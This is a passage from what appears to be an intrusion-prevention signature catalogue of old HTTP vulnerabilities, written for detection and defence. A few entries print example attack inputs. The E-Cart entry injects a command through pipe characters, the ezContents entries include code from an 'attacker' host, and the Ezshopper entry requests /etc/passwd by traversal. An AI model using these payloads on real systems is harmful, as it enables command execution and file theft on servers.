Platform:

Generic

Software:

Matt Wright's download.cgi

Type:

Directory Traversal

Description:

Matt Wright's download.cgi v.1.0 does not parse user input against directory traversal. Remote attackers can exploit the script by passing ../ in an argument to to 'f' parameter of download.cgi. This allows arbitrary files to be read from the web server.

References:

CVE-1999-1377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1377

HTTP-DragonFire-Ids-Dfire-Cgi

About this vulnerability:

DragonFire IDS dfire.cgi vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Unix

Software:

DragonFire IPS

Type:

Malfunction

Description:

The Web interface script dfire.cgi for DragonFire IDS allows an attacker to execute commands on the remote host as the user 'nobody'.

References:

CVE-1999-0913
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0913

BID-564
http://www.securityfocus.com/bid/564

HTTP-e107-ePing-Plugin-Command-Execution

About this vulnerability:

Command execution vulnerability in ePing plugin for e107

Risk:

Moderate

First detected in:

sgpkg-ips-31-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

e107 ePing

Type:

Metacharacter

Description:

Script 'doping.php' in ePing plugin for e107 fails to parse correctly user supplied arguments given to parameters 'eping_cmd', 'eping_host' and 'eping_count'. A remote attacker can exploit this vulnerability to execute arbitrary commands in the victim host.

Situation:

HTTP_CSU-e107-ePing-Plugin-Command-Execution

References:

CVE-2005-1949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1949

OSVDB-17245
http://www.osvdb.org/17245

HTTP-e107-eTrace-Plugin-Command-Execution

About this vulnerability:

Command execution vulnerability in eTrace plugin for e107

Risk:

Moderate

First detected in:

sgpkg-ips-31-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

e107 eTrace

Type:

Metacharacter

Description:

Script 'dotrace.php' in eTrace plugin for e107 fails to parse correctly user supplied arguments given to parameters 'etrace_cmd' and 'etrace_host'. A remote attacker can exploit this vulnerability to execute arbitrary commands in the victim host.

Situation:

HTTP_CSU-e107-eTrace-Plugin-Command-Execution

References:

CVE-2005-1966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1966

BID-13934
http://www.securityfocus.com/bid/13934

OSVDB-17288
http://www.osvdb.org/17288

HTTP-Easydynamicpages-Config-Php-System-Compromise

About this vulnerability:

Easydynamicpages config.php allows arbitrary PHP execution

Risk:

Moderate

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EasyDynamicPages

Type:

Malfunction

Description:

EasyDynamicPages 2.0 allows the execution of arbitrary PHP code by setting the edp_relative_path to point to a URL that contains a malicious serverdata.php script.

Situation:

HTTP_CRL-Easydynamicpages-Config-Php-System-Compromise

References:

CVE-2004-0073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0073

BID-9338
http://www.securityfocus.com/bid/9338

OSVDB-3408
http://www.osvdb.org/3408

OSVDB-3318
http://www.osvdb.org/3318

HTTP-ECart-Index-Cgi-Art-Parameter-Command-Execution

About this vulnerability:

ECart index.cgi command execution vulnerability via the art parameter

Risk:

Moderate

First detected in:

sgpkg-ips-25-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

E-Cart

Type:

Malfunction

Description:

The E-Cart webshop application does not validate input correctly, allowing arbitrary command execution through the art parameter. Remote attackers can use URLs such as http://www.example.com/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a| to execute commands on the Web server.

Situation:

HTTP_CRL-ECart-Index-Cgi-Art-Parameter-Command-Execution

References:

BID-13321
http://www.securityfocus.com/bid/13321

HTTP-eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the eCentrex VOIP Client Component ActiveX control

Risk:

High

First detected in:

sgpkg-ips-119-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

eCentrex VOIP Client Component

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the eCentrex VOIP Client Component ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, which allows the attacker to execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow
File-Text_eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-4489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4489

BID-25383
http://www.securityfocus.com/bid/25383

OSVDB-37738
http://www.osvdb.org/37738

HTTP-Emumail-Cgi-Cross-Site

About this vulnerability:

Emumail.cgi cross-site vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMUMail

Type:

Malfunction

Description:

EMUMail can be exploited by entering arbitrary HTML or script code into the email address field. This will result in the execution of the script code in the security context of the EMUMail site.

Situation:

HTTP_CRL-Emumail-Cgi-Cross-Site

References:

CVE-2002-1526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1526

BID-5824
http://www.securityfocus.com/bid/5824

HTTP-Everythingform-Cgi-System-Compromise

About this vulnerability:

Malfunction in everythingform.cgi allows system compromise

Risk:

Moderate

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Leif M. Wright everythingform.cgi

Type:

Malfunction

Description:

Leif M. Wright's everythingform.cgi does not sufficiently validate user input. Remote attackers can run arbitrary shell commands with the web server's privileges by passing suitable arguments to the 'config' field.

References:

CVE-2001-0023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0023

BID-2101
http://www.securityfocus.com/bid/2101

HTTP-eXtropia-Webstore-Command-Execution

About this vulnerability:

Arbitrary command execution vulnerability in Extropia Webstore

Risk:

High

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

eXtropia WebStore

Type:

Malfunction

Description:

Extropia Webstore does not filter user input properly. This allows remote attackers to execute arbitrary commands on the host.

Situation:

HTTP_CRL-eXtropia-Webstore-Command-Execution

References:

CVE-2004-0734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0734

BID-10744
http://www.securityfocus.com/bid/10744

HTTP-Ezcontents-Globals-Php-Code-Injection

About this vulnerability:

Ezcontents allows arbitrary php code injection

Risk:

High

First detected in:

sgpkg-ips-12-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ezContents

Type:

PHP Injection

Description:

Visual Shapers EzContents allows arbitrary php files to be included. Requesting http://[target]/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://attacker/ will import the code from http://attacker/include/adodb/adodb.inc.php. Also http://[target]/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://attacker/&GLOBALS[gsLanguage]=ezContents will import code from http://attacker/ezContents/lang_admin.php. Remote attackers may exploit these vulnerabilities to run arbitrary php code on the server.

Situation:

HTTP_CRL-Ezcontents-Globals-Php-Code-Injection

References:

CVE-2004-0132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0132

BID-9638
http://www.securityfocus.com/bid/9638

HTTP-Ezcontents-Module-Php-Link-System-Compromise

About this vulnerability:

Ezcontents module.php allows arbitrary PHP code execution

Risk:

Moderate

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ezContents

Type:

Malfunction

Description:

ezContents module.php allows remote attackers to execute arbitrary PHP code on the host by passing a URL to module.php that points to a malicious script.

Situation:

HTTP_CRL-Ezcontents-Module-Php-Link-System-Compromise

References:

CVE-2004-0070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0070

BID-9396
http://www.securityfocus.com/bid/9396

OSVDB-6878
http://www.osvdb.org/6878

HTTP-Ezshopper-Loadpage-Cgi-File-Disclosure

About this vulnerability:

Ezshopper loadpage.cgi has a directory traversal vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Ezshopper

Type:

Directory Traversal

Description:

Ezshoppers loadpage.cgi has a directory traversal vulnerability. Remote attackers may view arbitrary files from the webserver by sending a directory traversal sequence to loadpage.cgi?file. For example, http://www.example.com/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

References:

CVE-2000-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1092

BID-2109
http://www.securityfocus.com/bid/2109

HTTP-F-Prot-Anti-Virus-ACE-File-Denial-Of-Service

About this vulnerability:

Denial of service vulnerbility in F-Prot Anti-Virus

Risk:

Low

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

F-Prot Anti-Virus

Type:

Input Validation

Description:

There is a denial of service vulnerability in F-Prot Anti-Virus. A malicious, crafted ACE archive file causes an infinite loop in the F-Prot Anti-Virus scanning engine.

Situation:

HTTP_F-Prot-Anti-Virus-ACE-File-Denial-Of-Service
File-Binary_F-Prot-Anti-Virus-ACE-File-Denial-Of-Service

References:

CVE-2006-6352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6352

BID-21420
http://www.securityfocus.com/bid/21420

HTTP-F-Prot-Anti-Virus-CHM-File-Heap-Overflow

About this vulnerability:

Heap overflow vulnerbility in F-Prot Anti-Virus

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1730-5242

Platform:

Generic

Software:

F-Prot Anti-Virus

Type:

Input Validation

Description:

There is a heap overflow vulnerability in F-Prot Anti-Virus. A malicious, crafted compressed help (CHM) file allows code exection or denial of service in the F-Prot Anti-Virus scanning engine.

Situation:

HTTP_F-Prot-Anti-Virus-CHM-File-Heap-Overflow

References:

CVE-2006-6293
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6293

BID-21086
http://www.securityfocus.com/bid/21086

OSVDB-30406
http://www.osvdb.org/30406

HTTP-Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF

About this vulnerability:

Buffer overflow vulnerability in the Facebook Photo Uploader ActiveX control

Risk:

Moderate

First detected in:

sgpkg-ips-147-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Facebook Photo Uploader

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Facebook Photo Uploader ActiveX control. By persuading a user to view a malicious web page, a remote attacker can execute arbitrary code with the privileges of the currently logged on user.

Situation:

HTTP_SS-Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF
File-Text_Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF

References:

CVE-2008-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0660

BID-27756
http://www.securityfocus.com/bid/27756

HTTP-Failed-Authentication

About this vulnerability:	Failed HTTP authentication attempt
Risk:	Low
First detected in:	sgpkg-ips-65-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP server
Type:	Failed Login
Description:	Failed HTTP authentication attempt. If these failed attempts come in large numbers from a single host, a remote attacker may be trying to guess passwords via a brute-force method.
Situation:	HTTP_SLS-Unauthorized-Status-Code

HTTP-Filemail-Pl-System-Compromise

About this vulnerability:

Arbitrary command execution via filemail.pl

Risk:

High

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Lakeweb Filemail

Type:

Metacharacter Injection

Description:

Lakeweb's filemail.pl script does not sufficiently validate input, allowing remote attackers to execute arbitrary commands on the host by passing suitable arguments to the script.

References:

CVE-1999-1154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1154

HTTP-Firefox-BMP-Parser-Buffer-Overflow

About this vulnerability:

Firefox .bmp image parser buffer overflow

Risk:

High

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1730-5242

Platform:

Windows

Software:

Mozilla Firefox; Mozilla Suite; Mozilla Thunderbird

Type:

Buffer Overflow

Description:

Mozilla Firefox, Mozilla, and Thunderbird are vulnerable to a buffer overflow while parsing BMP images. Attackers can specify large values to the height and width of an image, thus causing an image size variable to overflow (height*width). A successful exploit allows running arbitrary code.

Situation:

HTTP_Firefox-BMP-Parser-Buffer-Overflow

References:

CVE-2004-0904
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0904

BID-11171
http://www.securityfocus.com/bid/11171

HTTP-Firefox-Executable-Image-Dragging-Vulnerability

About this vulnerability:

Invalid image file extension handling vulnerability in Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-62-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mozilla Firefox; Mozilla Suite; Mozilla Thunderbird

Type:

Malfunction

Description:

HTML image tags can refer to files that have an executable file extension (for example .bat or .exe). A remote attacker is able to construct a .bat file that contains image data that can be rendered on the browser and also some commands that can be executed. Mozilla Firefox fails to validate the file extensions of image files and because of that it is possible to drag and drop the image from the HTML page to desktop where it is saved as executable file. If the user then double clicks the file, the embedded commands are executed on the host.

Situation:

HTTP_Firefox-Executable-Image-Dragging-Vulnerability
File-Text_Firefox-Executable-Image-Dragging-Vulnerability

References:

CVE-2005-0230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0230

BID-12468
http://www.securityfocus.com/bid/12468

HTTP-Firefox-Gif-Netscape-Extension-BOF

About this vulnerability:

Firefox GIF handling vulnerability

Risk:

High

First detected in:

sgpkg-ips-24-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Buffer Overflow

Description:

Firefox versions before 1.0.2 allow arbitrary code execution through specially-crafted GIF images. GIF images can include "application extension blocks" that applications can use to include additional information into images. A rarely used Netscape specific extension for supplying a buffer size for displaying the image is not parsed correctly, allowing a specially-crafted GIF image to overflow a buffer and execute arbitrary code. Remote attackers can exploit the vulnerability by tricking users of the vulnerable versions of Firefox to view crafted GIF images.

Situation:

HTTP_SS-Firefox-Gif-Netscape-Extension-BOF
File-GIF_Mozilla-Firefox-Gif-Netscape-Extension-Buffer-Overflow

References:

CVE-2005-0399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0399

BID-15495
http://www.securityfocus.com/bid/15495

BID-12881
http://www.securityfocus.com/bid/12881

HTTP-Flatnuke-Id-Parameter-Directory-Traversal

About this vulnerability:

Flatnuke ID parameter allows directory traversal and arbitrary file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-53-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Flatnuke

Type:

Directory Traversal

Description:

Flatnuke, a content management system, has a directory traversal vulnerability. Passing directory traversal sequences (../) and a path followed by a null byte to the id parameter of Flatnuke's read module allows remote attackers to view arbitrary files from the web server.

Situation:

HTTP_CSU-Flatnuke-Id-Parameter-Directory-Traversal

References:

CVE-2005-4208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4208

BID-15796
http://www.securityfocus.com/bid/15796

HTTP-FtpLocate-Command-Execution

About this vulnerability:

FtpLocate allows arbitrary command execution via HTTP requests

Risk:

Moderate

First detected in:

sgpkg-ips-39-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

FtpLocate

Type:

Metacharacter Injection

Description:

FtpLocate is a software that indexes FTP servers contents and allows search queries to multiple FTP servers. Insufficient user input validation allows remote attackers to execute arbitrary commands by passing the commands between pipe metacharacters (|) to the fsite parameter of flsearch.pl.

Situation:

HTTP_CRL-FtpLocate-Command-Execution

References:

CVE-2005-2420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2420

BID-14367
http://www.securityfocus.com/bid/14367

OSVDB-18305
http://www.osvdb.org/18305

HTTP-Groupwise-Gwweb-Vuln

About this vulnerability:

Groupwise gwweb.exe revals path of server and any htm file

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Directory Traversal

Description:

The GroupWise gwweb.exe reveals the path of the server and contents of any directory and htm files.

References:

CVE-1999-1006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1006

BID-879
http://www.securityfocus.com/bid/879

HTTP-Groupwise-ServletManager-Application-Admin

About this vulnerability:

ServletManager uses default username/password

Risk:

Low

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Insecure Configuration

Description:

Novell Groupwise 6.0 and Enchancement Pack 5.5 is installed with a default username and password for the servlet manager. If successfully exploited, this allows remote attackers to control the loading, unloading and reloading of servlets.

Situation:

HTTP_CRL-Groupwise-ServletManager-Application-Admin

References:

CVE-2001-1195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1195

BID-3697
http://www.securityfocus.com/bid/3697

HTTP-Guestserver-Cgi-System-Compromise

About this vulnerability:

Command execution vulnerability in guestserver

Risk:

High

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lars Ellingsen's Guestserver

Type:

Malfunction

Description:

Lars Ellingsen's guestserver does not sufficiently parse input, allowing remote attackers to place executable commands between pipe characters in the email parameter.

Situation:

HTTP_CRL-Guestserver-Cgi-System-Compromise

References:

CVE-2001-0180
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0180

HTTP-Guppy-Error-Php-Server-Remote-Addr-Php-Command-Execution

About this vulnerability:

Error.php in Guppy allows arbitrary php code execution

Risk:

Moderate

First detected in:

sgpkg-ips-48-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Guppy

Type:

PHP Injection

Description:

Guppy, a PHP content management system, allows arbitrary remote PHP code execution. The _SERVER[REMOTE_ADDR] parameter in error.php can be overwritten, which causes error.php to include an attacker-supplied PHP file. This allows unauthenticated remote attackers to execute arbitrary PHP code on the Guppy server by sending a malicious request to error.php.

Situation:

HTTP_CRL-Guppy-Error-Php-Server-Remote-Addr-Php-Command-Execution

References:

CVE-2005-3926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3926

BID-15609
http://www.securityfocus.com/bid/15609

HTTP-Havij-SQL-Injection-Tool

About this vulnerability:	Havij SQL Injection Tool
Risk:	High
First detected in:	sgpkg-ips-507-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	SQL Injection
Description:	Havij SQL Injection tool can be used to find and exploit SQL injection vulnerabilities on a web page. There are both a free and a commercial version of the tool. The tool is developed and maintained by ITsecteam (www.itsecteam.com).
Situation:	HTTP_CSH-Havij-SQL-Injection-Tool-Usage

HTTP-His-Software-Auktion-Directory-Traversal

About this vulnerability:

HIS Software Auktion Directory Traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Windows 95; Windows 98; Windows NT

Software:

HIS Software Auktion

Type:

Directory Traversal

Description:

HIS Software Auktion contains a vulnerability which can be exploited to read any file on the system via directory traversal.

References:

CVE-2001-0212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0212

BID-2367
http://www.securityfocus.com/bid/2367

HTTP-Hosting-Controller-Information-Disclosure

About this vulnerability:

Information disclosure vulnerability in Hosting Controller

Risk:

Moderate

First detected in:

sgpkg-ips-27-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Hosting Controller

Type:

Malfunction

Description:

Hosting Controller is a hosting automation tool for Windows 2000 servers. The software contains multiple information disclosure vulnerabilities that can be used to gain information about the computers managed by Hosting Controller.

Situation:

HTTP_CSU-Hosting-Controller-HCDiskQuotaService-Access

References:

CVE-2005-0694
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0694

BID-12748
http://www.securityfocus.com/bid/12748

HTTP-HP-OpenView-Network-Node-Manager-Node-Parameter-Command-Execution

About this vulnerability:

Multiple scripts in HP OpenView Network Node Manager allow arbitrary command execution via shell metacharacters in URI

Risk:

Moderate

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Malfunction

Description:

Certain versions of the HP OpenView Network Node Manager do not correctly handle malicious HTTP requests. The scripts connectedNodes.ovpl, cdpView.ovpl, freeIPaddrs.ovpl and ecscmg.ovpl can be used to execute arbitrary commands via shell metacharacters in the 'node' parameter. The vulnerability allows unauthenticated remote attackers to execute arbitrary shell commands with HTTP requests.

Situation:

HTTP_CRL-OpenView-Network-Node-Manager-Node-Parameter-Command-Execution

References:

CVE-2005-2773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2773

BID-14662
http://www.securityfocus.com/bid/14662

HTTP-HP-Performance-Manager-Apache-Tomcat-Policy-Bypass

About this vulnerability:

Policy bypass vulnerability in HP Performance Manager

Risk:

High

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Any Operating System

Software:

HP Performance Manager

Type:

Malfunction

Description:

There is a policy bypass vulnerability in HP Performance Manager. A remote attacker can exploit this vulnerability by sending a crafted HTTP request using a set of default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system and execute arbitrary code with the privileges of SYSTEM.

Situation:

HTTP_CS-HP-Performance-Manager-Apache-Tomcat-Policy-Bypass

References:

CVE-2009-3548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548

BID-36954
http://www.securityfocus.com/bid/36954

OSVDB-60176
http://www.osvdb.org/60176

HTTP-HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in HP Software Update

Risk:

Moderate

First detected in:

sgpkg-ips-153-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Software Update

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP Software Update. A remote attacker can exploit this vulnerability by delivering a malicious INI file to the target system and persuading a user to view a crafted web page to execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow
File-Text_HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow

References:

CVE-2008-0712
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0712

BID-28929
http://www.securityfocus.com/bid/28929

OSVDB-44767
http://www.osvdb.org/44767

HTTP-Htgrep-Hdr-Directory-Traversal

About this vulnerability:

Htgrep Hdr Directory Traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

htgrep

Type:

Directory Traversal

Description:

Htgrep contains a vulnerability which can be exploited to read any file on the system by setting the full path into the hdr parameter.

References:

CVE-2000-0832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0832

HTTP-Hylafax-Faxsurvey-System-Compromise

About this vulnerability:

Arbitrary command-execution vulnerability in Faxsurvey

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Hylafax

Type:

Metacharacter Injection

Description:

A vulnerability in the faxsurvey script from Hylafax allows remote attackers to execute arbitrary commands on the host. The vulnerability can be exploited by sending the commands as an argument to faxsurvey.

Situation:

HTTP_CRL-Hylafax-Faxsurvey-System-Compromise

References:

CVE-1999-0262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0262

BID-2056
http://www.securityfocus.com/bid/2056

HTTP-Hyperseek-Hsx-Cgi-Directory-Traversal

About this vulnerability:

Hyperseek Hsx Cgi Directory Traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

iWeb Systems HyperSeek 2000

Type:

Directory Traversal

Description:

Hyperseek 2000 contains a vulnerability which can reveal arbitary files on the system using directory traversal and null.

References:

CVE-2001-0253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0253

BID-2314
http://www.securityfocus.com/bid/2314

HTTP-IBM-Lotus-Domino-Web-Server-HTTP-Header-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the IBM Lotus Domino Web Server application

Risk:

High

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Lotus Domino

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the IBM Lotus Domino Web Server application. A successful exploitation leads to a denial of service terminating the affected server, or System-level arbitrary code execution.

Situation:

HTTP_CS-IBM-Lotus-Domino-Web-Server-HTTP-Header-Buffer-Overflow

References:

CVE-2008-2240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2240

BID-29310
http://www.securityfocus.com/bid/29310

OSVDB-45415
http://www.osvdb.org/45415

HTTP-IBM-Lotus-Domino-Web-Service-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in Lotus Domino web service

Risk:

Moderate

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Domino

Type:

Resource Starvation

Description:

There is a denial of service vulnerability in Lotus Domino web service. The vulnerability can be exploited by sending a crafted HTTP request with a long string of UTF-8 encoded UNICODE characters in URI, causing a DoS condition on the target server.

Situation:

HTTP_CSU-IBM-Lotus-Domino-Web-Service-Denial-Of-Service

References:

CVE-2005-0986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0986

BID-13045
http://www.securityfocus.com/bid/13045

HTTP-IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution

About this vulnerability:

Command injection vulnerability in IBM Lotus Expeditor

Risk:

High

First detected in:

sgpkg-ips-153-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM Lotus Expeditor Client for Desktop

Type:

Code Injection

Description:

There is a command injection vulnerability in IBM Lotus Expeditor. A remote attacker can exploit this vulnerability by persuading a user to visit a malicious web page. Successful exploitation allows the attacker to inject and execute arbitrary commands with the privileges of the currently logged in user.

Situation:

HTTP_SS-IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution
File-Text_IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution

References:

CVE-2008-1965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1965

BID-28926
http://www.securityfocus.com/bid/28926

OSVDB-44868
http://www.osvdb.org/44868

HTTP-IBM-Lotus-Notes-Domino-Long-URI-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Lotus Notes Domino

Risk:

High

First detected in:

sgpkg-ips-333-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Domino

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in IBM Lotus Notes Domino Webserver. Succesful attack could allow the attacker to execute arbitrary commands on the remote server.

Situation:

HTTP_CSU-Lotus-Notes-Cgi-Bin-BOF

References:

CVE-2000-0021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0021

BID-881
http://www.securityfocus.com/bid/881

HTTP-IBM-Lotus-Sametime-Server-Multiplexer-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Community Services Multiplexer component of IBM Lotus Sametime

Risk:

High

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1734-5242

Platform:

Any Operating System

Software:

IBM Lotus Sametime

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Community Services Multiplexer component of IBM Lotus Sametime. The vulnerability allows a remote unauthenticated attacker to cause a denial of service terminating the affected service or to execute System-level arbitrary code on the vulnerable system.

Situation:

HTTP_CSU-IBM-Lotus-Sametime-Server-Multiplexer-Stack-Buffer-Overflow

References:

CVE-2008-2499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2499

BID-29328
http://www.securityfocus.com/bid/29328

OSVDB-45610
http://www.osvdb.org/45610

HTTP-IBM-Tivoli-Storage-Manager-Host-Header-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in IBM Tivoli Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-395-4219

Last changed:

sgpkg-ips-1581-5242

Platform:

Windows

Software:

IBM Tivoli

Type:

Buffer Overflow

Description:

The IBM Tivoli Storage Manager suffers from a buffer overflow vulnerability in its Client Acceptor Daemon (CAD) service. The service uses a protocol based on HTTP for communication, but has a flaw in the handling of HTTP Host headers. The vulnerability allows remote attackers to execute arbitrary code on a vulnerable host by sending an specially crafted long HTTP Host header.

References:

CVE-2007-4880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4880

BID-25743
http://www.securityfocus.com/bid/25743

OSVDB-38161
http://www.osvdb.org/38161

HTTP-Ie-Anchorclick-Style-File-Import

About this vulnerability:

File import vulnerability in IE

Risk:

High

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Microsoft Internet Explorer allows web pages to open local folders in a Web folder view. This can be used for example to trick victims to drag and drop malicious software to the local Startup folder.

Situation:

HTTP_Ie-Anchorclick-Style-File-Import
File-Text_Ie-Anchorclick-Style-File-Import

References:

CVE-2004-0839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0839

BID-10973
http://www.securityfocus.com/bid/10973

MS04-038
http://technet.microsoft.com/security/bulletin/MS04-038

HTTP-Ie-HTTP-Equiv-Meta-Tag-DoS

About this vulnerability:

IE crashes when crafted http-equiv meta tag is encountered

Risk:

Low

First detected in:

sgpkg-ips-11-1102

